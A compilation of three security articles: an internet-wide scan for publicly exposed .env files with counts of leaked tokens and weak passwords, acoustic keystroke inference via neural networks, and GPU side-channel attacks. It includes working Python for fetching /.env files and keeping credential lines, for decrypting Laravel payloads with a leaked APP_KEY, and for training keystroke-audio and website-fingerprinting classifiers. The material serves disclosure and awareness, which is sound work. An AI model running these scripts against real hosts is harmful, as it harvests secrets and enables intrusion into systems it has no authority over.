Publicly accessible .ENV files

( Original text by BinaryEdge )

Deployment is something a lot of companies still struggle with. A few weeks ago we talked in a blog post about Kubernetes being deployed insecurely and how Kubernetes pods are being hijacked to mine cryptocurrency.

This week we look at something different, but still related to deployments and to exposing things to the public that should not be exposed.

A tweet from @svblxyz (whom we would also like to thank for all the help reviewing this post and for tips on things to add) showed us an interesting Google dork, which made us wonder: what does this look like when focused on IP addresses, rather than on domains/services as Google search is?

svbl (@svblxyz), Sep 26, 2018:

“👏 Don’t put your .env files in the web-server directory https://www.google.com/search?q=db_password+filetype%3Aenv”

So we launched a scan using our distributed platform, as simple as:

> curl https://api.binaryedge.io/v1/tasks -d '{
      "description": "HTTP Worldscan .env",
      "type": "scan",
      "options": [{
          "targets": ["XXXX"],
          "ports": [{
              "modules": ["http"],
              "port": "80",
              "config": { "http_path": "/.env" }
          }]
      }]
  }' -H 'X-Token:XXXXXX'
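
The http module simply requests the configured path, /.env in this case, on port 80 of every target. For a single host, a rough local equivalent of that check might look like the following Python sketch (the host is a placeholder, and the helper name is ours):

    # Rough single-host equivalent of the scan's HTTP module: fetch /.env and
    # keep any lines that look like KEY=VALUE pairs. Illustrative only.
    import re
    import requests

    def check_env_exposure(host: str, timeout: float = 5.0) -> list[str]:
        """Return the KEY=VALUE lines served at http://<host>/.env, if any."""
        try:
            resp = requests.get(f"http://{host}/.env", timeout=timeout)
        except requests.RequestException:
            return []
        if resp.status_code != 200:
            return []
        # Real .env files are plain KEY=VALUE lines; anything else is noise.
        return [line for line in resp.text.splitlines()
                if re.match(r"^[A-Z][A-Z0-9_]*=", line)]

    if __name__ == "__main__":
        for line in check_env_exposure("example.com"):  # placeholder host
            print(line)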

After this, the results started coming in, and of course multiple issues can be identified from these scans:

  • Bad deployments: .env files should never be reachable from the web, yet there are companies exposing this type of file, fully readable, with no authentication.
  • Weak credentials: lots of services use a username/password combo with a weak password.

Credentials and Tokens

Many different types of service tokens were found:

  • AWS — 38 tokens
  • Mangopay — 9 tokens
  • Stripe — 89 tokens
  • Pusher — 1600 tokens

Other tokens found include:

  • PlugandPlay
  • Paypal
  • Mailchimp
  • Facebook
  • PhantomJS
  • Mailgun
  • Twitter
  • JWT
  • Google
  • WeChat
  • Shopify
  • Nexmo
  • Bitly
  • Braintree
  • Twilio
  • Recaptcha
  • Ucloud
  • Firebase
  • Mandrill
  • Slack
  • Sentry.io
  • Shopzcoin

Many of these systems involve financial records/payments.

But we also found access configurations for databases, which potentially contain customer data, such as:

  • DB_PASSWORD keys: 1161
  • REDIS_PASSWORD keys: 801
  • MySQL credentials: 946 (username/password combos).
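
Counts like these can be produced by tallying key names across the collected files. A minimal sketch, assuming each captured .env body is saved as a text file under a results/ directory (the paths and key list are ours):

    # Tally interesting key names across collected .env bodies, assuming one
    # captured body per file under ./results/. Paths and key list are made up.
    from collections import Counter
    from pathlib import Path

    INTERESTING = {"DB_PASSWORD", "REDIS_PASSWORD", "APP_KEY"}

    counts = Counter()
    for path in Path("results").glob("*.env"):
        for line in path.read_text(errors="ignore").splitlines():
            key, _, _ = line.partition("=")
            if key.strip() in INTERESTING:
                counts[key.strip()] += 1

    for key, n in counts.most_common():
        print(f"{key}: {n}")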

Looking at the top 3 passwords in use, we see that they are all weak:

1. secret (93 occurrences)
2. root (33 occurrences)
3. adminadmin (24 occurrences)

Other weak passwords found are:

  • password
  • test123
  • foobar

When exposed tokens go super bad…

Laravel

Also very dangerous are situations like CVE-2018-15133, where a leaked APP_KEY for a Laravel app allows an attacker to execute commands on the machine where the Laravel instance is running.

And our scan found 300 APP_KEY tokens related to Laravel.
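
To see why a leaked APP_KEY is so damaging: Laravel encrypts cookies and session payloads as base64-encoded JSON holding an IV, an AES-256-CBC ciphertext keyed by APP_KEY, and an HMAC-SHA256 over both. Anyone holding the key can decrypt and forge these payloads, and CVE-2018-15133 turns a forged payload into remote code execution through deserialization. A minimal decryption sketch in Python (illustrative only; the function name is ours):

    # Decrypt a Laravel-style encrypted payload given a leaked APP_KEY.
    # Payload format: base64(JSON{iv, value, mac}), AES-256-CBC, with an
    # HMAC-SHA256 over the base64 iv + base64 value. Illustrative sketch.
    import base64, hashlib, hmac, json
    from cryptography.hazmat.primitives.ciphers import Cipher, algorithms, modes

    def laravel_decrypt(app_key: str, payload_b64: str) -> bytes:
        # .env files usually store the key as "base64:<key>".
        key = base64.b64decode(app_key.removeprefix("base64:"))
        payload = json.loads(base64.b64decode(payload_b64))
        mac = hmac.new(key, (payload["iv"] + payload["value"]).encode(),
                       hashlib.sha256).hexdigest()
        if not hmac.compare_digest(mac, payload["mac"]):
            raise ValueError("MAC mismatch: wrong key or tampered payload")
        decryptor = Cipher(algorithms.AES(key),
                           modes.CBC(base64.b64decode(payload["iv"]))).decryptor()
        padded = decryptor.update(base64.b64decode(payload["value"])) \
                 + decryptor.finalize()
        return padded[:-padded[-1]]  # strip PKCS#7 padding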

One important note: we looked only at port 80, internet-wide, for our scan. The exposure can easily be much higher, as other web apps on other ports will surely be exposing more .env files!

Acoustic Audio Patterns Could Be Giving Away Your Passwords, Learned by Neural Nets

( Original text by nugget )

In an age where Facebook, Google, Amazon, and many others are amassing an immense amount of data, what could be more concerning than drastic advancements in artificial intelligence? Thanks to neural networks and deep learning, tons of decision problems can be solved by simply having enough labelled data. The implications of this big data coexisting with the artificial intelligence to harvest information from it are endless. Not only are there good implications, including self-driving cars, voice recognition like Amazon Alexa, and intelligent applications like Google Maps, but there are also many bad implications like mass user-profiling, potential government intrusion, and, you guessed it, breaches into modern cryptographic security. Thanks to deep learning and neural networks, your password for most applications might just be worthless.

Since the cryptographic functions used in password hashing are currently secure, many attacks attempt to acquire the user’s password before it even reaches the database. For more information, see this article on password applications and security. For this reason, attacks using keyloggers, dictionary attacks, and inference attacks based on common password patterns are common, and these attacks actually work quite frequently. Now, however, deep learning has paved the way for a new kind of inference attack, based on the sound of the keys being typed.

History

Investigations into distinguishing keystrokes by their sound are not new. Scientists have been exploring this attack vector for many years. In 2014, scientists used digraphs to model an alphabet based on keystroke sounds. In addition, statistical techniques were used in conjunction with the likely letters being typed (determined by the sound patterns) to construct the words that were statistically most likely to have been typed, given the overall typing sound. This “shallow learning” approach is a good example of a specific set of techniques developed for a specific task in data science research.

Approaches like this one were used for years in fields like image feature recognition. The results were never groundbreaking, because it is very difficult for humans to hand-craft a good model for a task with a massive number of variables to consider. However, deep learning is now in the picture, and has been for some time. Image recognition with deep learning is so good it is almost magical, and it certainly is scary. This means that matching keystroke sounds to the keystrokes themselves might just be possible.

Implications of Neural Networks

Nowadays, training models to recognize keystrokes from audio is a task that has been performed successfully; keystroke sound has even been used as a biometric authentication factor. While this fact is cool, the deeper implications are quite scary. With the ability to train a massive neural network on the plethora of labelled keystroke-sound data available on the web, a model that predicts keystrokes from audio with high accuracy can be created with little effort.
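
To make that concrete, here is a minimal sketch of a keystroke-audio classifier in Python, assuming a directory of labelled WAV clips with one keystroke per clip (the file layout, features, and model choice are all ours; real attacks use far more data and far deeper models):

    # Minimal keystroke-audio classifier sketch. Assumes ./keystrokes/ holds
    # one-keystroke WAV clips named like "a_001.wav" (label before the "_").
    from pathlib import Path

    import librosa
    import numpy as np
    from sklearn.ensemble import RandomForestClassifier
    from sklearn.model_selection import train_test_split

    def features(path: Path) -> np.ndarray:
        y, sr = librosa.load(path, sr=None)
        mfcc = librosa.feature.mfcc(y=y, sr=sr, n_mfcc=20)
        return mfcc.mean(axis=1)  # average MFCCs over the clip

    clips = sorted(Path("keystrokes").glob("*.wav"))
    X = np.stack([features(p) for p in clips])
    y = [p.stem.split("_")[0] for p in clips]  # label = key name from filename

    X_tr, X_te, y_tr, y_te = train_test_split(X, y, test_size=0.25, random_state=0)
    clf = RandomForestClassifier(n_estimators=200).fit(X_tr, y_tr)
    print("held-out accuracy:", clf.score(X_te, y_te))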

Combined with other inference approaches, you could be vulnerable any time anyone is able to record you typing your password. In fact, according to this article by phys.org, with a little extra information, such as keyboard type and typist style, attackers can determine keystrokes with 91.7% accuracy. Without this information, they still achieve an impressive 41.89% accuracy. Even at this lower accuracy, attackers may still be able to determine your password, since partial recovery can clue them into your password style, e.g. using children's or pets' names in your passwords. Once attackers have an idea of your password style, they can massively reduce the password space, as stated in this article. With a reduced password space, brute-force and dictionary attacks become extremely viable. Essentially, with advancements in deep learning, the audio of you typing your password is definitely a viable attack vector.
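
The impact of that password-space reduction is easy to quantify. A toy calculation, assuming an 8-character lowercase password and an audio model that narrows each keystroke down to 3 candidate keys (the numbers are purely illustrative):

    # Toy calculation: how much does per-keystroke audio inference shrink a
    # brute-force search? Assumes an 8-char lowercase password and a model
    # that narrows each keystroke to 3 candidate keys (illustrative numbers).
    full_space = 26 ** 8  # all lowercase 8-character passwords
    narrowed = 3 ** 8     # 3 candidate keys per keystroke
    print(f"{full_space:,} -> {narrowed:,} "
          f"({full_space // narrowed:,}x fewer guesses)")
    # prints: 208,827,064,576 -> 6,561 (31,828,542x fewer guesses)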

What you can do to protect yourself

The main exposure to this attack lies in the VoIP software widely used by companies and individuals alike to communicate. When you use software like Skype, your audio is transmitted to your call partners, and that audio includes the sound of you typing. This typing could be deciphered using machine learning and inference attacks, and any attacker on the call could recover some or all of what is being typed. Some of this typed text may well include passwords or other sensitive information that an attacker wants. Other vulnerable situations include any in which someone can covertly record your keystrokes; for example, someone may record you typing in person, using their phone, without you knowing.

So, to protect yourself, be sure that you have a second factor authenticating you in important security applications. Most login interfaces, such as Gmail's, offer 2-factor authentication. Be sure that this is enabled, so that your password is not the only factor in your login. This reduces the risk posed by attackers obtaining your password. Additionally, of course, using good password practices will make it harder for inference attacks to supplement deep learning in acquiring your password. Finally, you can certainly reduce the risk of audio-based attacks by not typing passwords while on VoIP calls.

Conclusion

Certainly, there isn't much you can do to prevent your typing audio from being eavesdropped on. The implications that deep learning has for audio-based password attacks are definitely scary. Neural networks may well make your password worthless, and they are only getting stronger. The future of artificial intelligence will change not only modern authentication systems, but society in ways we can't even imagine. The only thing we can do in response is be aware and adapt.

If you have any questions or comments about this post, feel free to leave a comment or contact me!

GPU side channel attacks can enable spying on web activity, password stealing

( Original text )

Computer scientists at the University of California, Riverside have revealed for the first time how easily attackers can use a computer’s graphics processing unit, or GPU, to spy on web activity, steal passwords, and break into cloud-based applications.

Threat scenarios

Marlan and Rosemary Bourns College of Engineering computer science doctoral student Hoda Naghibijouybari and post-doctoral researcher Ajaya Neupane, along with Associate Professor Zhiyun Qian and Professor Nael Abu-Ghazaleh, reverse engineered a Nvidia GPU to demonstrate three attacks on both graphics and computational stacks, as well as across them.

All three attacks require the victim to first acquire a malicious program embedded in a downloaded app. The program is designed to spy on the victim’s computer.

Web browsers use GPUs to render graphics on desktops, laptops, and smart phones. GPUs are also used to accelerate applications on the cloud and data centers. Web graphics can expose user information and activity. Computational workloads enhanced by the GPU include applications with sensitive data or algorithms that might be exposed by the new attacks.

GPUs are usually programmed using application programming interfaces, or APIs, such as OpenGL. OpenGL is accessible by any application on a desktop with user-level privileges, making all attacks practical on a desktop. Since desktop or laptop machines by default come with the graphics libraries and drivers installed, the attack can be implemented easily using graphics APIs.

The first attack tracks user activity on the web. When the victim opens the malicious app, it uses OpenGL to create a spy that infers the behavior of the browser as it uses the GPU. Every website has a unique trace in terms of GPU memory utilization, due to the different numbers and sizes of objects being rendered. This signal is consistent across multiple loads of the same website and is unaffected by caching.

The researchers monitored either GPU memory allocations over time or GPU performance counters and fed these features to a machine learning based classifier, achieving website fingerprinting with high accuracy. The spy can reliably obtain all allocation events to see what the user has been doing on the web.
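
As a concrete illustration of that classification step, here is a sketch (not the authors' code; the file names and summary features are ours) that fingerprints websites from fixed-length traces of GPU memory-allocation sizes:

    # Sketch: classify which website produced a GPU memory-utilization trace.
    # Assumes traces.npy holds fixed-length series of allocation sizes and
    # labels.npy the site visited per trace; not the authors' pipeline.
    import numpy as np
    from sklearn.ensemble import GradientBoostingClassifier
    from sklearn.model_selection import cross_val_score

    traces = np.load("traces.npy")  # shape: (n_visits, n_samples)
    labels = np.load("labels.npy")  # shape: (n_visits,)

    # Crude per-trace summary features; the real feature set is richer.
    X = np.column_stack([traces.mean(axis=1), traces.std(axis=1),
                         traces.max(axis=1), np.diff(traces, axis=1).std(axis=1)])

    clf = GradientBoostingClassifier()
    print("cross-validated accuracy:", cross_val_score(clf, X, labels, cv=5).mean())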

In the second attack, the authors extracted user passwords. Each time the user types a character, the whole password textbox is uploaded to the GPU as a texture to be rendered. Monitoring the interval between consecutive memory-allocation events leaked the number of password characters and the inter-keystroke timings, both well-established signals for recovering passwords.
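
Extracting that timing signal is straightforward once the spy can observe the allocation events. A small sketch with made-up timestamps:

    # Sketch: derive password length and inter-keystroke timings from the
    # timestamps of allocation events that fire once per typed character.
    import numpy as np

    event_times = np.array([0.000, 0.180, 0.412, 0.540, 0.795])  # seconds, made up
    intervals = np.diff(event_times)
    print("characters typed:", len(event_times))
    print("inter-keystroke intervals (ms):", (intervals * 1000).round(1))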

The third attack targets a computational application in the cloud. The attacker launches a malicious computational workload on the GPU that operates alongside the victim's application. Depending on the neural network's parameters, the intensity and pattern of contention on the cache, memory, and functional units differ over time, creating measurable leakage. The attacker uses machine-learning-based classification on performance counter traces to extract the victim's secret neural network structure, such as the number of neurons in a specific layer of a deep neural network.

The researchers reported their findings to Nvidia, who responded that they intend to publish a patch that offers system administrators the option to disable access to performance counters from user-level processes. They also shared a draft of the paper with the AMD and Intel security teams to enable them to evaluate their GPUs with respect to such vulnerabilities.

In the future the group plans to test the feasibility of GPU side channel attacks on Android phones.